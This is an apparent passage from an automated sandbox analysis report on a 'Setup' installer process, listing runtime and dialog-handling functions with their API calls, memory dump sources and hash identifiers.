                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                    • Opcode ID: 51780a6dc5e66fe78de21196b60bcdb7d5b1203e8b24dd67d9ed493d7d4e5a7e
                                                                                                                                                                    • Instruction ID: 50f3eb298948715bc7fe1f046f65543b60755c426003292239cd3dceed36a7ea
                                                                                                                                                                    • Opcode Fuzzy Hash: 51780a6dc5e66fe78de21196b60bcdb7d5b1203e8b24dd67d9ed493d7d4e5a7e
                                                                                                                                                                    • Instruction Fuzzy Hash: 95C09B36040148F7DB111E81DC05F45BF99D795751F14C061F608054628773D421D794
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D7C53D Relevance: 1.3, APIs: 1, Instructions: 58COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(?,69DAA320,F0D05EFD,?,?), ref: 69D7C55E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1452528299-0
                                                                                                                                                                    • Opcode ID: f7a79d130b4229416044c1bee7a6f1fdeba178338f845159911ef5b9e52ef48f
                                                                                                                                                                    • Instruction ID: 82a026de308a01724d481b59edecadc0e81bac646db805e9c1f6e466fed1979c
                                                                                                                                                                    • Opcode Fuzzy Hash: f7a79d130b4229416044c1bee7a6f1fdeba178338f845159911ef5b9e52ef48f
                                                                                                                                                                    • Instruction Fuzzy Hash: C0115272645701EFEB34CF35D916B2677E4AB00714F10893EE246DE6D0DB7AE5408B54
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 009A2BA5 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 009A40FF
                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009A4114
                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(009A1C60), ref: 009A411F
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 009A413B
                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 009A4142
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4195199090.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4195128625.00000000009A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195262631.00000000009A8000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195338114.00000000009AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_9a0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2579439406-0
                                                                                                                                                                    • Opcode ID: e426aa4d0af1b79dfe109d17683a659f34065d19c05389d4fe5fcaef14dba431
                                                                                                                                                                    • Instruction ID: 394a72a876b9b18ac33da8537764e2b9c95912ba2c60402dcf6dfed863af957a
                                                                                                                                                                    • Opcode Fuzzy Hash: e426aa4d0af1b79dfe109d17683a659f34065d19c05389d4fe5fcaef14dba431
                                                                                                                                                                    • Instruction Fuzzy Hash: CB21CFB482D2249FCB40DF29E9896953BF4BF0E315F10401AE50A8B7B1E7B55886EFD4
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 009A3C03 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,009A2AAE), ref: 009A3C0B
                                                                                                                                                                    • __mtterm.LIBCMT ref: 009A3C17
                                                                                                                                                                      • Part of subcall function 009A3937: _DecodePointerInternal@4.SETUP(00000006,009A3D79,?,009A2AAE), ref: 009A3948
                                                                                                                                                                      • Part of subcall function 009A3937: TlsFree.KERNEL32(0000001D,009A3D79,?,009A2AAE), ref: 009A3962
                                                                                                                                                                      • Part of subcall function 009A3937: DeleteCriticalSection.KERNEL32(00000000,00000000,009A2976,?,009A3D79,?,009A2AAE), ref: 009A420F
                                                                                                                                                                      • Part of subcall function 009A3937: _free.LIBCMT ref: 009A4212
                                                                                                                                                                      • Part of subcall function 009A3937: DeleteCriticalSection.KERNEL32(0000001D,009A2976,?,009A3D79,?,009A2AAE), ref: 009A4239
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 009A3C2D
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 009A3C3A
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 009A3C47
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 009A3C54
                                                                                                                                                                    • TlsAlloc.KERNEL32(?,009A2AAE), ref: 009A3CA4
                                                                                                                                                                    • TlsSetValue.KERNEL32(00000000,?,009A2AAE), ref: 009A3CBF
                                                                                                                                                                    • __init_pointers.LIBCMT ref: 009A3CC9
                                                                                                                                                                    • _EncodePointerInternal@4.SETUP(?,009A2AAE), ref: 009A3CDA
                                                                                                                                                                    • _EncodePointerInternal@4.SETUP(?,009A2AAE), ref: 009A3CE7
                                                                                                                                                                    • _EncodePointerInternal@4.SETUP(?,009A2AAE), ref: 009A3CF4
                                                                                                                                                                    • _EncodePointerInternal@4.SETUP(?,009A2AAE), ref: 009A3D01
                                                                                                                                                                    • _DecodePointerInternal@4.SETUP(009A3ACF,?,009A2AAE), ref: 009A3D22
                                                                                                                                                                    • __calloc_crt.LIBCMT ref: 009A3D37
                                                                                                                                                                    • _DecodePointerInternal@4.SETUP(00000000,?,009A2AAE), ref: 009A3D51
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 009A3D63
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4195199090.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4195128625.00000000009A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195262631.00000000009A8000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195338114.00000000009AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_9a0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Internal@4Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                    • API String ID: 1131704290-3819984048
                                                                                                                                                                    • Opcode ID: 6e9a69e4aad97f6111d03d43bfde8a3ac697f7ce3cb140dba4d57aec56c4a10f
                                                                                                                                                                    • Instruction ID: 8d36981fa3ba37b220e635e4b12840122de77bf711d9018c877bdcd687315ed5
                                                                                                                                                                    • Opcode Fuzzy Hash: 6e9a69e4aad97f6111d03d43bfde8a3ac697f7ce3cb140dba4d57aec56c4a10f
                                                                                                                                                                    • Instruction Fuzzy Hash: 3F316B31968320AEDF11AF79AC1A75A7EB8BF87764B00451AF448922F0DF758540EFD0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698DE153 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 163COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 698DE179
                                                                                                                                                                    • GetParent.USER32 ref: 698DE18B
                                                                                                                                                                    • GetWindow.USER32(?,00000004), ref: 698DE197
                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 698DE1A5
                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 698DE1BB
                                                                                                                                                                    • MonitorFromWindow.USER32(?,00000002), ref: 698DE1DA
                                                                                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 698DE1F7
                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 698DE220
                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,000000FF,000000FF,00000015,?,00000000,?,00000002,?,?,?,?,?), ref: 698DE2C7
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Window$LongMonitorRect$FromInfoParent
                                                                                                                                                                    • String ID: (
                                                                                                                                                                    • API String ID: 1468510684-3887548279
                                                                                                                                                                    • Opcode ID: 196279d7f32722ff95baf9f5dbad6a91748aeeb0025435d502d483f421e8d56d
                                                                                                                                                                    • Instruction ID: 7dd478fc963e87ef665d87a1c61cd8dafcc054a45e4fc870248ae57a4d5b2f57
                                                                                                                                                                    • Opcode Fuzzy Hash: 196279d7f32722ff95baf9f5dbad6a91748aeeb0025435d502d483f421e8d56d
                                                                                                                                                                    • Instruction Fuzzy Hash: E8518E71A002099FDF04CEA8CD88AAEBBB9BF4A355F140528F911F7295D770AD08CB50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698F09E0 Relevance: 16.9, APIs: 11, Instructions: 430windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 698F09E7
                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 698F0A02
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                    • MapDialogRect.USER32(?,00000000), ref: 698F0AEE
                                                                                                                                                                    • ShowWindow.USER32(00000000,00000001,00000000,?,?,?,40000000,?,?,00000000), ref: 698F0B68
                                                                                                                                                                    • SendMessageW.USER32(00000000,00000030,?,00000001), ref: 698F0B78
                                                                                                                                                                      • Part of subcall function 698DF589: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 698DF5AC
                                                                                                                                                                      • Part of subcall function 698DF589: GetObjectW.GDI32(00000000,0000005C,?), ref: 698DF5B5
                                                                                                                                                                      • Part of subcall function 698DF589: CreateFontIndirectW.GDI32(?), ref: 698DF600
                                                                                                                                                                      • Part of subcall function 698DF589: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 698DF610
                                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000010), ref: 698F0C2A
                                                                                                                                                                    • SendMessageW.USER32(00000000,00000170,?,00000000), ref: 698F0C70
                                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00000010), ref: 698F0CA3
                                                                                                                                                                      • Part of subcall function 698EF933: SendMessageW.USER32(?,00000172,00000000,?), ref: 698EF944
                                                                                                                                                                    • MapDialogRect.USER32(?,00000000), ref: 698F0DAB
                                                                                                                                                                    • SendMessageW.USER32(?,00000030,?,00000001), ref: 698F0E0A
                                                                                                                                                                    • ShowWindow.USER32(?,00000001,?,00000000,?,?,?,?,?,?,?,?,?,6990677E,000000FF), ref: 698F0E15
                                                                                                                                                                      • Part of subcall function 698EF8DE: CreateWindowExW.USER32(00000000,STATIC,?,?,?,?,?,?,?,?,00000000,?), ref: 698EF91E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MessageSend$Window$CreateDialogImageLoadRectShow$FontH_prolog3H_prolog3_IndirectObject
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2777900791-0
                                                                                                                                                                    • Opcode ID: 65c3cb44529aa373712f4ace1602c591bd36cddc24ab783db305b468c283322d
                                                                                                                                                                    • Instruction ID: c82beea17d176747e8ad660d31df0157bcdb68866c450a42e1b8a5187214a5f8
                                                                                                                                                                    • Opcode Fuzzy Hash: 65c3cb44529aa373712f4ace1602c591bd36cddc24ab783db305b468c283322d
                                                                                                                                                                    • Instruction Fuzzy Hash: 6402F275A00208AFCF04DFA8C998A9DBBF6FF8D311F148499E506AB361DB35A945CF50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698E795B Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 115COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698E7962
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                    • EnumWindows.USER32(698E7C3F,?), ref: 698E79BF
                                                                                                                                                                      • Part of subcall function 698E7BC5: _calloc.LIBCMT ref: 698E7BE6
                                                                                                                                                                      • Part of subcall function 698E7AC7: __EH_prolog3.LIBCMT ref: 698E7ACE
                                                                                                                                                                    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 698E7ABB
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$EnumExceptionRaiseWindows_calloc
                                                                                                                                                                    • String ID: complete$Action$Blocking Processes$Enumerating incompatible processes$No Blocking Processes$[ProcessID] [ImageName] [WindowTitle] [WindowVisible]
                                                                                                                                                                    • API String ID: 3326300193-1989790735
                                                                                                                                                                    • Opcode ID: 0fa0682eaf52c6344b6b4a890229e97145a37b15f9792a70c5f65dd60543da3f
                                                                                                                                                                    • Instruction ID: 53df6bdf36519889d43e43116875d5b57ca034c42c2e0a0ef52598238f2c3815
                                                                                                                                                                    • Opcode Fuzzy Hash: 0fa0682eaf52c6344b6b4a890229e97145a37b15f9792a70c5f65dd60543da3f
                                                                                                                                                                    • Instruction Fuzzy Hash: 1241BE75A00249EFDB00DFA8C848F9DBBF5BF55318F54884DE504EB292CB709A4ACB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698F210E Relevance: 15.5, APIs: 10, Instructions: 457windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 698F215F
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                    • MapDialogRect.USER32(?,00000000), ref: 698F2267
                                                                                                                                                                    • ShowWindow.USER32(?,00000001,?,?,?,?,40000000,?,?,00000000), ref: 698F22ED
                                                                                                                                                                    • SendMessageW.USER32(?,00000030,?,00000001), ref: 698F22FF
                                                                                                                                                                      • Part of subcall function 698DF589: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 698DF5AC
                                                                                                                                                                      • Part of subcall function 698DF589: GetObjectW.GDI32(00000000,0000005C,?), ref: 698DF5B5
                                                                                                                                                                      • Part of subcall function 698DF589: CreateFontIndirectW.GDI32(?), ref: 698DF600
                                                                                                                                                                      • Part of subcall function 698DF589: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 698DF610
                                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000010), ref: 698F23BB
                                                                                                                                                                    • SendMessageW.USER32(?,00000170,?,00000000), ref: 698F2408
                                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00000010), ref: 698F243C
                                                                                                                                                                      • Part of subcall function 698EF933: SendMessageW.USER32(?,00000172,00000000,?), ref: 698EF944
                                                                                                                                                                    • MapDialogRect.USER32(?,00000000), ref: 698F255F
                                                                                                                                                                    • SendMessageW.USER32(?,00000030,?,00000001), ref: 698F25C4
                                                                                                                                                                    • ShowWindow.USER32(?,00000001,?,00000000), ref: 698F25CF
                                                                                                                                                                      • Part of subcall function 698EF8DE: CreateWindowExW.USER32(00000000,STATIC,?,?,?,?,?,?,?,?,00000000,?), ref: 698EF91E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MessageSend$Window$CreateDialogImageLoadRectShow$FontH_prolog3IndirectObject
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 727718542-0
                                                                                                                                                                    • Opcode ID: ca590c9a1a237536e7b1430cfc8ce02fc32157be7cbc4c4ea929cdbeab5da6df
                                                                                                                                                                    • Instruction ID: 944ca6caadab45c442264719584782c96cd1f4ceb49f481ae3bf7cdd98be87ea
                                                                                                                                                                    • Opcode Fuzzy Hash: ca590c9a1a237536e7b1430cfc8ce02fc32157be7cbc4c4ea929cdbeab5da6df
                                                                                                                                                                    • Instruction Fuzzy Hash: 58020275604341AFCB04DF68C888A1ABBF6FF89354F10896DF5868B361DB35D845CB92
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698E21B8 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 199COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698E21BF
                                                                                                                                                                      • Part of subcall function 698E1F81: __EH_prolog3.LIBCMT ref: 698E1F88
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                      • Part of subcall function 698DD76F: __EH_prolog3.LIBCMT ref: 698DD776
                                                                                                                                                                      • Part of subcall function 698DCA39: __EH_prolog3.LIBCMT ref: 698DCA40
                                                                                                                                                                      • Part of subcall function 698DCAC2: __EH_prolog3.LIBCMT ref: 698DCAC9
                                                                                                                                                                      • Part of subcall function 698DD170: __EH_prolog3.LIBCMT ref: 698DD177
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 698E2425
                                                                                                                                                                      • Part of subcall function 698FDBDB: RaiseException.KERNEL32(?,?,698F9236,?,?,?,?,?,698F9236,?,69907F54,699122B4), ref: 698FDC1D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$ExceptionException@8RaiseThrow
                                                                                                                                                                    • String ID: Bitmap$Font$Icon$Text$UIInfo.xml$UiInfo element 'Static' should have one of Text, Icon or Bitmap elements!
                                                                                                                                                                    • API String ID: 1412866469-225342085
                                                                                                                                                                    • Opcode ID: f2c7a5ea108312a8a29d9078070dbcf20b48c641b37a13061aa68c0d2c3776e8
                                                                                                                                                                    • Instruction ID: 78ce33d0947c175a46b04b49900924a619a73b6718398cfc7d422b2ca6714b9f
                                                                                                                                                                    • Opcode Fuzzy Hash: f2c7a5ea108312a8a29d9078070dbcf20b48c641b37a13061aa68c0d2c3776e8
                                                                                                                                                                    • Instruction Fuzzy Hash: F8817F7590014CEFDB01DBECC944BDEB7B8AF1A318F248999E414EB291D734EA09DB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698DE9B3 Relevance: 12.1, APIs: 8, Instructions: 109COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CallNextHookEx.USER32(?,00000005,?,?), ref: 698DE9CF
                                                                                                                                                                    • UnhookWindowsHookEx.USER32(?), ref: 698DE9FD
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Hook$CallNextUnhookWindows
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 969045306-0
                                                                                                                                                                    • Opcode ID: 313467c7b8d402ec0c87e5f1c79566ca6a0a22f466ae067d962a9516b2ca85a2
                                                                                                                                                                    • Instruction ID: 50c3596e6cc015a48d261251a0d9f6a6fafd445356e045c13f6bb1cc5ca9df6a
                                                                                                                                                                    • Opcode Fuzzy Hash: 313467c7b8d402ec0c87e5f1c79566ca6a0a22f466ae067d962a9516b2ca85a2
                                                                                                                                                                    • Instruction Fuzzy Hash: 8F417E35A00A0AEFDB10DF19C888EA9B7B5FF11B59F10C919F4669B1A1D331EA48CF50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698E48B6 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 180COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698E48BD
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                      • Part of subcall function 698DD76F: __EH_prolog3.LIBCMT ref: 698DD776
                                                                                                                                                                      • Part of subcall function 698E1F81: __EH_prolog3.LIBCMT ref: 698E1F88
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
